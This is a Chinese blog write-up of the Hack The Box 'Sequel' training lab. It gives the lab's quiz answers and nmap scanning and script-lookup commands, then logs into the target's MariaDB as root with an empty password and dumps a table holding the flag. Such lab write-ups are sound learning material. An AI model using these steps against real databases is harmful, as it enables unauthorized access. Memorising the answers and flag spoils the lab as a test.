HTB_Sequel 靶机之数据库连接与nmap脚本使用

⚔🌲 YOU NEED TO WALK BEFORE YOU CAN RUN 🌲⚔

先放答案

Structured Query Language
3306
MariaDB
-u
root
*
;

nmap 脚本

日常扫描,使用 -A ,扫描了挺长一段时间,3306 端口开放了 MariaDB 数据库服务

┌──(root💀kali)-[~]
└─# nmap -A -T4 10.129.94.92
PORT     STATE SERVICE VERSION
3306/tcp open  mysql?
|_sslv2: ERROR: Script execution failed (use -d to debug)
| mysql-info: 
|   Protocol: 10
|   Version: 5.5.5-10.3.27-MariaDB-0+deb10u1

学一个新的参数 -sC ,这是代表使用一些默认脚本进行扫描,有用的结果并没有什么不同,也是数据库版本

┌──(root💀kali)-[~]
└─# nmap -sC -sV -T4 10.129.94.92 

nmap 的脚本是以 .nse 结尾的,可以在如下目录查看

┌──(root💀kali)-[~]
└─# ls /usr/share/nmap/scripts/ 

在这里插入图片描述

根据关键词搜索脚本,如 sql

┌──(root💀kali)-[~]
└─# ls /usr/share/nmap/scripts/ | grep sql

在这里插入图片描述

脚本的使用也很简单,使用帮助命令查看脚本说明文档,比如查看 ms-sql-ntlm-info.nse

┌──(root💀kali)-[~]
└─# nmap --script-help=ms-sql-ntlm-info

在这里插入图片描述

点击即可查看使用方法,应该不用教了

在这里插入图片描述

如何连接数据库?

回到靶机实验,因为提示了空密码,我们就不加 -p 参数了,使用命令行连接

┌──(root💀kali)-[~]
└─# mysql -u root -h 10.129.94.92 -D mysql
MariaDB [mysql]>

使用的话也和 mysql 一样

MariaDB [mysql]> show databases;
+--------------------+
| Database           |
+--------------------+
| htb                |
| information_schema |
| mysql              |
| performance_schema |
+--------------------+
4 rows in set (0.294 sec)

查询数据,flag 就在第一个数据库第一个表里

MariaDB [mysql]> use htb;
MariaDB [htb]> show tables;
+---------------+
| Tables_in_htb |
+---------------+
| config        |
| users         |
+---------------+
MariaDB [htb]> select * from config;
+----+-----------------------+----------------------------------+
| id | name                  | value                            |
+----+-----------------------+----------------------------------+
|  1 | timeout               | 60s                              |
|  2 | security              | default                          |
|  3 | auto_logon            | false                            |
|  4 | max_size              | 2M                               |
|  5 | flag                  | 7b4bec00d1a39e3dd4e021ec3d915da8 |
|  6 | enable_uploads        | false                            |
|  7 | authentication_method | radius                           |
+----+-----------------------+----------------------------------+

pwn!😏

在这里插入图片描述

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值